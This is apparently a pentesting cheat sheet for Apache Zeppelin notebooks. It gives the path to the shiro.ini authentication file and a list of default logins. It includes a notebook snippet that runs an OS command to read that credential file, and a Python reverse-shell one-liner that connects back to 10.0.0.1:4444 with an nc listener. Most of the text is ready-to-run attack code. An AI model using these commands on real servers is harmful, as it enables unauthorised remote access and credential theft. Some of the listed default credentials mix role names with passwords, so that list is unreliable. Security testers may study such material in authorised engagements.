Apache Zeppelin Pentesting

Apache Zeppelin is a web-based notebook that enables data-driven. It uses 8080 port by default.

- [shiro_authentication](https://zeppelin.apache.org/docs/0.8.0/setup/security/shiro_authentication.html)

Authentication Config File

/shiro.ini


Default Credentials

admin:admin
admin:password1
user1:password2
user1:role1
user1:role2
user2:password3
user2:role3
user3:password4
user3:role2


RCE in Notebooks

We can execute remote OS command in notebooks. Access to the notebook and execute the following scripts.

%python

import os

# Configurations
os.system('cat conf/shiro.ini')

Reverse Shell

Before executing the following script, we need to start a listener such as nc -lvnp 4444 in local machine.

%python

import os,pty,socket;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")